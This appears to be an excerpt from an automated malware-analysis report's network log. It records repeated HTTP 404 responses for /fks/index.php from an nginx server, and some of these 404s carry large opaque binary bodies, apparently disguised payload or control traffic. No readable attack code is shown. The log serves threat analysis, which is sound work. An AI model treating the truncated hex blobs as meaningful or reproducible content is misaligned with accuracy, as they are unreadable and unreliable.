Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 27 Dec 2023 17:12:47 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 35 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 154<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 27 Dec 2023 17:12:48 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 35 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 154<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 27 Dec 2023 17:12:48 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 66 61 38 0d 0a 00 00 86 7d fd 5f f4 7c dd d5 07 e8 51 b7 af c5 63 e2 6c f0 3c d5 6e 87 ce 45 13 b6 e7 71 91 a2 5d f8 d7 5e 38 9f 7b c3 66 48 ad 39 e2 8d 18 d4 8e 85 0f de f7 5a f6 fc 42 98 13 94 4c 87 b1 33 ad 1b ff 98 08 31 b4 ab e8 cf d3 16 e5 c8 6c bc 16 9d ae 82 d7 3b 97 d4 3a 1a b1 e2 dd 79 13 1b a7 49 75 4d ba 1e 8a 7f 35 79 66 37 61 e0 24 f3 a5 af 1c 18 d0 b5 77 a3 37 d9 9c 37 b9 08 2d c8 72 f7 fb c6 b0 ff 66 b2 0a e1 01 68 78 48 b1 fb 9e 1a 14 f1 c9 e9 21 0c f3 1a a3 04 28 3c ff 5b d0 e4 d3 a2 7a 4d 8a a4 75 b4 43 01 52 21 6f 40 51 f8 43 eb 40 cb 12 84 0f da 06 f9 b5 40 33 1e 73 50 75 9d 0d 97 2d a0 f8 5c 13 54 09 11 89 d2 af 2b e4 a2 31 97 24 41 7f fe b3 ae 2f 7d c7 74 d7 9c 3c 4b d5 4c 11 96 84 3c 18 51 72 0c 6b 96 35 f0 e8 1b 7f 1f d4 d0 63 1a f8 bc 40 de dc fb 5d 56 ff 9b a2 ca 71 83 e8 b9 5f 05 24 18 f7 29 94 8d 8b 73 9a cc 76 61 e6 96 c7 c1 61 ed 41 c3 4a 2c ff 1f 74 97 af a6 7b b2 1c 70 f5 92 37 cf ad 86 78 68 90 77 1f b9 2d 53 69 c2 52 67 3a 85 75 20 6a f8 4c 46 f2 f8 3e 7e e4 a9 f3 b6 7c 90 41 c0 c6 74 40 e5 bf ef 87 b0 6d 65 84 46 23 a2 59 3e 35 26 1f 18 c2 2b fd 11 d7 20 0b bd 7b f6 3e 06 7b 72 f6 1d 02 7c 1b 4c b5 f7 ae 91 9d 60 d1 08 20 5e cd e8 b1 55 84 3a a6 47 4e 89 4f 21 25 db db 1c 4c 13 b7 f6 51 cc 1b 32 f0 75 81 93 f1 da 36 ad 1b bf 78 51 79 fe d6 11 e1 47 e4 bc 0f 53 e2 57 df 87 b4 87 d1 86 da c0 40 c7 37 18 24 6c 52 c2 4e 14 86 39 4c f9 d3 19 1f 1a 0b 46 fd 99 74 70 3e 94 63 a1 6f c2 75 6e fd 29 2a b9 dd 10 64 b9 90 fc d7 21 ce fd f8 62 7e 28 4f fa ad 59 ac 44 36 09 bc dc 08 48 f8 cc 76 de 0c 91 7d 02 f8 63 6d 3b 0e 84 03 b9 02 5d 17 74 fb ce 9b d2 fa 97 29 6e ac 51 02 8d e6 24 bd 70 7b 3e 3f 43 d2 34 c9 cc bf 20 a5 33 9b 82 df 1a 17 59 db db 96 e2 46 a1 ff 82 20 86 aa d2 c7 86 e5 9c 77 30 96 2b a3 d7 e3 0b 2e d2 e4 32 1a 0c a4 89 8c 89 1a 1b 70 30 55 d4 6a 72 f3 79 9b 1d 68 65 1e 20 2c 4e f7 79 22 6a 07 d0 7a 87 76 57 ec fe fd d5 c9 a5 a5 16 b1 ef a0 0f 77 33 40 69 72 55 bb 11 0f e4 4f 38 a1 a2 6d 63 2c 32 02 8b a4 b7 13 15 0e ce 8a 0b 48 04 13 47 4c d7 76 bf b6 94 ec 9f f5 aa b8 26 e6 fe ce 60 20 fa 15 e5 44 55 23 f6 a0 6e 54 f6 04 d0 18 d1 38 33 c8 c9 54 d6 c6 4f 41 27 43 64 c7 46 f0 3c 9d c1 51 b9 72 11 51 c3 f9 e6 7f 22 e9 29 f1 0c 91 a2 85 5e 91 70 a5 62 22 42 c4 45 f6 ab 87 68 0a 76 2b 79 ef 2e ce ad 78 6a 69 6e 75 77 06 c2 f9 35 4f b0 93 43 10 68 3f d2 85 0b f8 fa e3 95 14 a7 81 d1 b9 da 41 61 6a da 44 54 ee e2 1d 4c e3 e5 17 cf 0c ec 0a 7d e1 d0 5b 83 0e f5 e2 fe 83 0f 6a a1 2a 17 d2 2a 44 74 95 84 c3 db c6 64 24 db cb 54 be 8b e4 f7 ab af 89 df 8c e1 b5 2d 3f b9 35 53 46 31 32 ba 7e 15 54 13 0f cf 6a 45 0a 5f 3d d2 ee 75 9b eb b1 76 52 6b 57 4c 93 23 fc fd 61 b8 5a 12 6c 30 34 db 9e e3 c6 e2 bd 0f ce e3 25 05 60 16 f8 0e 21 c5 a4 f1 a3 0b f9 aa b5 38 7c d5 68 63 2c b3 89 fd ec c6 4d 25 b8 1e 88 81 5e f6 aa fb 3b 2
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 27 Dec 2023 17:12:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 35 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 154<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 27 Dec 2023 17:12:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 66 61 38 0d 0a 00 00 86 7d fd 5f f4 7c dd d5 07 e8 51 b7 af c5 63 e2 6c f0 3c d5 6e 87 ce 45 13 b6 e7 71 91 a2 5d f8 d7 5e 38 9f 7b c3 66 48 ad 39 e2 8d 18 d4 8e 85 0f de f7 5a f6 fc 42 98 13 94 4c 87 b1 33 ad 1b ff 98 08 31 b4 ab e8 cf d3 16 e5 c8 6c bc 16 9d ae 82 d7 3b 97 d4 3a 1a b1 e2 dd 79 13 1b a7 49 75 4d ba 1e 8a 7f 35 79 66 37 61 e0 24 f3 a5 af 1c 18 d0 b5 77 a3 37 d9 9c 37 b9 08 2d c8 72 f7 fb c6 b0 ff 66 b2 0e e1 c7 14 c2 e5 b1 fb 9e 1a 14 f1 c9 e9 21 0c ff 1a a3 04 13 3c ff 3d d6 e4 d3 44 7a 4d 8a a4 75 b4 cd 7b 0b 21 6f 40 51 f8 43 0b 46 cb 12 84 0f da 06 f9 b5 40 33 1e 73 50 75 9d 0d 97 2d a0 f8 5c 13 54 09 11 89 d2 af 2b e4 a2 a2 97 24 47 7f fe f8 e8 12 7d c7 74 d7 99 3c 4b d5 4c 11 96 84 3c 18 51 72 0c 6b 96 35 f0 e8 1b 7f 1f d4 d0 63 1a f8 bc 40 de dc fb 5d 56 d5 e7 a3 ca 6a 83 e8 b9 5f 25 25 18 b7 58 94 8d 8b 73 9a cc 76 61 e6 96 c7 c1 61 ed 41 c3 4a 2c ff df 71 97 a3 a6 7b b2 1c 70 f5 92 37 cf ad 86 78 68 90 77 1f b9 2d 53 69 c2 52 67 3a 85 75 20 6a f8 4c 46 f2 f8 3e 7e e4 a9 f3 b6 7c 90 41 c0 c6 74 40 e5 bf ef 87 b0 6d 45 84 46 2b a2 59 3e 35 26 1f 18 c2 2b fd 11 df 00 0b bd 33 f6 3e 06 7b 72 f6 1d 02 7c 1b 4c bb a3 eb c9 c9 40 f1 28 44 c2 cb e8 b1 55 84 3a a6 dd 4a 89 4f 27 25 db db 1c 4c 13 b7 f6 51 cc 1b 32 f0 75 81 93 f1 da 38 ff 48 ed 3b 71 59 de de 0e e1 47 e4 5c 09 53 e2 19 df 87 b4 2f d5 86 da c0 40 c7 37 18 24 6c 52 c2 4e 14 86 39 4c f9 dd 4b 5a 56 44 05 dd b9 74 70 3e 94 63 41 6e c2 75 6e fd 29 2a 8f d9 10 64 b9 90 fc d7 21 ce fd f8 62 7e 28 4f fa ad 59 82 2d 52 68 c8 bd 08 48 f8 ec 76 de 0c d1 79 02 b8 5d 68 3b 0e 30 02 b9 4a 5d 17 74 f9 ce 9e d2 be be 2c 6e 20 43 02 4d c9 56 ce 02 10 3e 3f 45 92 38 c9 cc bb bd a5 33 9b 96 df 1a 17 ef da db 96 e2 46 a1 ff 82 20 86 aa d2 c7 86 a5 9c 77 70 b8 5f cb b2 8e 62 4a b3 e4 b2 4d 0c a4 09 88 89 09 2b 75 30 50 1c 6b 72 f2 79 9b 0c 68 1b 0e 20 2c 44 fd 7a 3c 7a 07 30 5e cd 08 38 98 f4 d1 d3 cd 6f 61 17 9a ee eb 0f 64 ff 6b 79 48 47 bb 11 0f e4 4b d8 2c b7 6d 63 2d 39 71 99 c4 b7 19 79 0d c9 9c 0f 60 17 13 47 46 d7 72 a0 a6 ca fa 61 f4 bc 46 27 f5 ee df 70 1a 0e 15 e5 44 55 3c e6 2d 7b 54 f6 05 dd 07 c1 b5 26 c8 c9 55 c5 c2 3c 55 27 43 6e d4 43 8e 3f 9d c1 55 a7 63 15 47 dc e9 ce 6a 22 e9 23 f1 72 92 a2 85 5a 8e 68 ac 74 3d 52 ec 50 f6 ab 8d 68 1b 73 0b f9 ef 2e ce c2 6e 6a 69 64 75 66 03 e2 79 35 4f b0 fc 54 10 68 35 d2 94 0e f1 95 fb 95 14 ad 81 c0 bc cd 2e 78 6a da 4e 54 ff e7 0c 48 8c ff 17 cf 06 ec 1b 78 f9 bf 40 83 0e ff e2 ef 86 60 76 a1 2a 1d c1 2c 55 72 92 92 c4 55 af 0b 39 db cb 5e cd 95 e4 f7 a1 b9 fa c0 8c e1 bf 3e 38 a8 32 47 b8 30 21 aa 6f 05 79 5f 0f ef 6a 55 0a 5f b0 c7 ee 75 9a f8 b9 5d 7d 6b 46 4b 82 2b ea dd 61 a8 5a 12 03 10 34 db 94 f0 cf f3 b4 19 30 e2 33 fb 61 05 e8 1f 31 e8 a6 da b1 03 e8 a2 a3 29 75 ba 49 63 2c b9 89 fd fb d5 5d 0e 74 0f 8f ee 7c f6 aa f1 3b 2
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 27 Dec 2023 17:12:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 35 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 154<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 27 Dec 2023 17:12:55 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 35 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 154<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 27 Dec 2023 17:12:55 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 66 61 38 0d 0a 00 00 86 7d fd 5f f4 7c dd d5 07 e8 51 b7 af c5 63 e2 6c f0 3c d5 6e 87 ce 45 13 b6 e7 71 91 a2 5d f8 d7 5e 38 9f 7b c3 66 48 ad 39 e2 8d 18 d4 8e 85 0f de f7 5a f6 fc 42 98 13 94 4c 87 b1 33 ad 1b ff 98 08 31 b4 ab e8 cf d3 16 e5 c8 6c bc 16 9d ae 82 d7 3b 97 d4 3a 1a b1 e2 dd 79 13 1b a7 49 75 4d ba 1e 8a 7f 35 79 66 37 61 e0 24 f3 a5 af 1c 18 d0 b5 77 a3 37 d9 9c 37 b9 08 2d c8 72 f7 fb c6 b0 ff 66 b2 0b e1 d7 3f ab 49 b1 fb 9e 1a 14 f1 c9 e9 21 0c d3 1a a3 04 13 3c ff 2f e2 e4 d3 c6 7a 4d 8a a4 75 b4 e3 b5 60 21 6f 40 51 f8 43 0b 72 cb 12 84 0f da 06 f9 b5 40 33 1e 73 50 75 9d 0d 97 2d a0 f8 5c 13 54 09 11 89 d2 af 2b e4 82 03 97 24 41 7f fe b3 ae 2f 7d c7 74 d7 9c 3c 4b d5 4c 11 96 84 3c 18 51 72 0c 6b 96 35 f0 e8 1b 7f 1f d4 d0 63 1a f8 bc 40 de dc fb 5d 56 47 2f 90 ca 69 83 e8 b9 5f 45 21 18 ef 4a 94 8d 8b 73 9a cc 76 61 e6 96 c7 c1 61 ed 41 c3 4a 2c ff 7f 46 97 af a6 7b b2 1c 70 f5 92 37 cf ad 86 78 68 90 77 1f b9 2d 53 69 c2 52 67 3a 85 75 20 6a f8 4c 46 f2 f8 3e 7e e4 a9 f3 b6 7c 90 41 c0 c6 74 40 e5 bf ef 87 b0 6d 65 84 46 23 a2 59 3e 35 26 1f 18 c2 2b fd 11 d7 20 0b bd 7b f6 3e 06 7b 72 f6 1d 02 7c 1b 4c b5 f7 ae 91 9d 60 d1 08 40 2b ff e8 b1 55 84 3a a6 33 7c 89 4f 21 25 db db 1c 4c 13 b7 f6 51 cc 1b 32 f0 75 81 93 f1 da 36 ad 0d a1 74 32 79 fe c2 72 e1 47 e4 5c 3d 53 e2 31 df 87 b4 cb e3 86 da c0 40 c7 37 18 24 6c 52 c2 4e 14 86 39 4c fb fd 6b 7a 76 64 25 fd 99 78 70 3e 94 63 61 6a c2 75 6c fd 29 2a 3d d8 10 64 b9 90 fc d7 21 ce fd f8 62 7e 28 0f fa ad 1b ac 44 36 09 bc dc 08 48 f8 cc 76 de 0c 91 7d 02 58 d7 5f 3b 0e 84 03 b9 02 5d 17 74 fb ce 9b d2 76 27 21 6e 80 ad 2b 8d e6 24 bd 70 11 3e 3f 43 92 18 c9 cc bb dd a1 33 9b 82 df 1a 17 59 db db 96 e2 46 a1 ff 82 20 86 aa d2 c7 86 e5 9c 77 30 96 2b a3 d7 e3 0b 2e d2 e4 32 1a 0c a4 89 8c 89 dc 03 c3 8f ef 7d 8c f7 37 ed 41 34 71 42 e2 9f e0 c6 6f d1 54 f0 97 1e 19 dd cc 83 ec 16 cf ad 18 9b ed a8 25 45 51 8a a1 b7 8b 41 51 d4 56 ae b2 07 18 de 08 dc 86 ab 21 e0 73 d1 0d be df 30 65 85 fc 82 8e 11 bb f7 5d 53 71 1e 5d 46 3d 29 ba 48 3d 20 1e e3 d4 e6 9f 3b 5d fb b9 8a 33 bb 4b b4 6d a3 ff ff 53 76 8e 84 23 56 32 e9 0e 43 47 9e ba db 5a fc b0 64 dc 0b 52 1f de 9c f4 e7 9c 6b 32 0e bb 52 bf 5e 0d 61 4e 12 ac 04 82 2c 54 9b e0 14 13 f2 42 ce 8a ad 1f d6 f5 b2 34 70 81 c5 40 a5 a1 f9 2f 42 13 f8 5a 7a 0f a1 28 bc a9 7c db fd 8d fa ad 8e c2 1c 1a b3 e1 d3 3f 7b a3 c3 16 27 bd 8b 88 81 10 93 ce d7 42 e8 a9 e3 5c 80 d3 e8 43 f9 d7 6f de 6e 9c 83 2e a5 82 60 ee 60 93 48 59 90 3d 24 13 5e 9c 51 58 a8 33 25 5e b9 34 dd 06 44 09 fd db 7f 28 74 39 52 e4 49 46 89 24 6e 0d 37 97 b5 a6 3b f1 00 41 50 71 e3 8f 45 5e 6f ac 6e 43 3e b6 e3 97 6d f1 4c ae d8 f4 a8 72 f8 2f 55 7b 3e 32 0f 43 de 05 eb fc a1 dd 17 5b b3 8e c3 10 a1 68 6e a0 7e a8 5b 18 f7 3f 84 fc ee 63 ec 4e 9f c7 12 7e 0a 1f 6a 8a 4
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 27 Dec 2023 17:13:05 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 35 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 154<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 27 Dec 2023 17:13:05 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 66 61 38 0d 0a 00 00 86 7d fd 5f f4 7c dd d5 07 e8 51 b7 af c5 63 e2 6c f0 3c d5 6e 87 ce 45 13 b6 e7 71 91 a2 5d f8 d7 5e 38 9f 7b c3 66 48 ad 39 e2 8d 18 d4 8e 85 0f de f7 5a f6 fc 42 98 13 94 4c 87 b1 33 ad 1b ff 98 08 31 b4 ab e8 cf d3 16 e5 c8 6c bc 16 9d ae 82 d7 3b 97 d4 3a 1a b1 e2 dd 79 13 1b a7 49 75 4d ba 1e 8a 7f 35 79 66 37 61 e0 24 f3 a5 af 1c 18 d0 b5 77 a3 37 d9 9c 37 b9 08 2d c8 72 f7 fb c6 b0 ff 66 b2 0a e1 b0 c9 4e f1 b1 fb 9e 1a 14 f1 c9 e9 21 0c ff 1a a3 04 13 3c ff a7 d7 e4 d3 08 7b 4d 8a a4 75 b4 63 3d 54 21 6f 40 51 f8 43 8b 46 cb 12 84 0f da 06 f9 b5 40 33 1e 73 50 75 9d 0d 97 2d a0 f8 5c 13 54 09 11 89 d2 af 2b e4 62 31 97 24 41 7f fe b3 ae 2f 7d c7 74 d7 9c 3c 4b d5 4c 11 96 84 3c 18 51 72 0c 6b 96 35 f0 e8 1b 7f 1f d4 d0 63 1a f8 bc 40 de dc fb 5d 56 df a7 a4 ca 71 83 e8 b9 5f 65 22 18 2f 83 95 8d 8b 73 9a cc 76 61 e6 96 c7 c1 61 ed 41 c3 4a 2c ff df 74 97 af a6 7b b2 1c 70 f5 92 37 cf ad 86 78 68 90 77 1f b9 2d 53 69 c2 52 67 3a 85 75 20 6a f8 4c 46 f2 f8 3e 7e e4 a9 f3 b6 7c 90 41 c0 c6 74 40 e5 bf ef 87 b0 6d 65 84 46 23 a2 59 3e 35 26 1f 18 c2 2b fd 11 d7 20 0b bd 7b f6 3e 06 7b 72 